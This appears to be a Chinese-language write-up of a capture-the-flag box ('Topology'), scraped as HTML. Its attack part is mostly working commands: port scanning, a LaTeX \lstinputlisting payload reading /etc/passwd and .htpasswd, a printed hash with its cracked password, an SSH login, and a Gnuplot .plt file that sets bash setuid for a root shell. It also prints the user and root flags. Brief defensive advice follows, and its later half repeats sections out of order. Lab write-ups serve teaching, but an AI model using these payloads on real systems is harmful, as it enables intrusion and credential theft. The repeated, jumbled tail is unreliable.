LaTeX LFI与Gnuplot .plt权限提升漏洞分析与利用<\/h1>

信息收集<\/h2>

目标系统概况<\/h3>

IP地址: 10.10.11.217<\/li>
操作系统: Ubuntu Linux<\/li>

开放端口:

22\/tcp: OpenSSH 8.2p1<\/li>

80\/tcp: Apache httpd 2.4.41<\/li> <\/ul> <\/li> <\/ul>

扫描结果<\/h3>

$ ip=<\/span>'10.10.11.217'<\/span>; itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>;
<\/span><\/span>    ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>;
<\/span><\/span>    if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>        echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>;
<\/span><\/span>        nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>;
<\/span><\/span>    else<\/span>
<\/span><\/span>        echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>;
<\/span><\/span>    fi<\/span>;
<\/span><\/span>else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>;
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>LaTeX本地文件包含(LFI)漏洞利用<\/h2>
环境准备<\/h3>

添加目标主机到本地hosts文件:<\/li>
<\/ol>
echo "10.10.11.217 topology.htb latex.topology.htb"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>
访问目标网站:<\/li>
<\/ol>
http:\/\/latex.topology.htb\/equation.php
<\/code><\/pre>
漏洞利用<\/h3>
LaTeX的\lstinputlisting<\/code>命令可用于读取服务器上的任意文件:<\/p>

读取\/etc\/passwd文件:<\/li>
<\/ol>
$<\/span>\lstinputlisting{\/<\/span>etc\/<\/span>passwd}$<\/span>
<\/span><\/span><\/code><\/pre>
读取web目录下的.htpasswd文件获取凭据:<\/li>
<\/ol>
$<\/span>\lstinputlisting{\/<\/span>var\/<\/span>www\/<\/span>dev\/<\/span>.htpasswd}$<\/span>
<\/span><\/span><\/code><\/pre>获取到哈希值:<\/p>
vdaisley:$apr1$1ONUB\/S2$58eeNVirnRDB5zAIbIxTY0
<\/code><\/pre>

使用John the Ripper破解哈希:<\/li>
<\/ol>
john hash -w \/home\/maptnh\/Desktop\/rockyou.txt
<\/span><\/span><\/code><\/pre>破解出的密码: calculus20<\/code><\/p>
获取初始访问权限<\/h3>
使用破解的凭据通过SSH登录:<\/p>
ssh vdaisley@10.10.11.217
<\/span><\/span><\/code><\/pre>获取user flag:<\/p>
ea549fbe9b9b240c598e7bf40f2f9532
<\/code><\/pre>
Gnuplot .plt权限提升<\/h2>
Gnuplot简介<\/h3>
Gnuplot是一个命令行驱动的科学绘图工具，支持多种图形输出类型。它可以执行.plt文件中的命令。<\/p>
提权步骤<\/h3>


检查\/opt\/gnuplot目录下的.plt文件<\/p>
<\/li>

创建恶意.plt文件执行系统命令:<\/p>
<\/li>
<\/ol>
echo 'system "chmod u+s \/bin\/bash"'<\/span> > \/opt\/gnuplot\/exp.plt
<\/span><\/span><\/code><\/pre>

执行.plt文件(可能需要等待定时任务或其他触发方式)<\/p>
<\/li>

获取root shell:<\/p>
<\/li>
<\/ol>
\/bin\/bash -p
<\/span><\/span><\/code><\/pre>
读取root flag:<\/li>
<\/ol>
a7da9976eb37c87c889639f9e98503df
<\/code><\/pre>
防御建议<\/h2>
针对LaTeX LFI<\/h3>

禁用或限制\lstinputlisting<\/code>命令的使用<\/li>
实施输入验证和过滤<\/li>
使用沙箱环境处理LaTeX渲染<\/li>
限制文件系统访问权限<\/li>
<\/ol>
针对Gnuplot提权<\/h3>

更新Gnuplot到最新版本<\/li>
限制.plt文件的执行权限<\/li>
监控\/opt\/gnuplot目录的变更<\/li>
避免以root权限运行Gnuplot脚本<\/li>
实施最小权限原则<\/li>
<\/ol>

LaTeX LFI与Gnuplot .plt权限提升漏洞分析与利用<\/h1>

信息收集<\/h2>

LaTeX本地文件包含(LFI)漏洞利用<\/h2>

Gnuplot .plt权限提升<\/h2>

Gnuplot简介<\/h3> Gnuplot是一个命令行驱动的科学绘图工具，支持多种图形输出类型。它可以执行.plt文件中的命令。<\/p>

防御建议<\/h2>

针对Gnuplot提权<\/h3> 更新Gnuplot到最新版本<\/li> 限制.plt文件的执行权限<\/li> 监控\/opt\/gnuplot目录的变更<\/li> 避免以root权限运行Gnuplot脚本<\/li> 实施最小权限原则<\/li> <\/ol>

Gnuplot简介<\/h3>
Gnuplot是一个命令行驱动的科学绘图工具，支持多种图形输出类型。它可以执行.plt文件中的命令。<\/p>

针对Gnuplot提权<\/h3>

更新Gnuplot到最新版本<\/li>
限制.plt文件的执行权限<\/li>
监控\/opt\/gnuplot目录的变更<\/li>
避免以root权限运行Gnuplot脚本<\/li>
实施最小权限原则<\/li> <\/ol>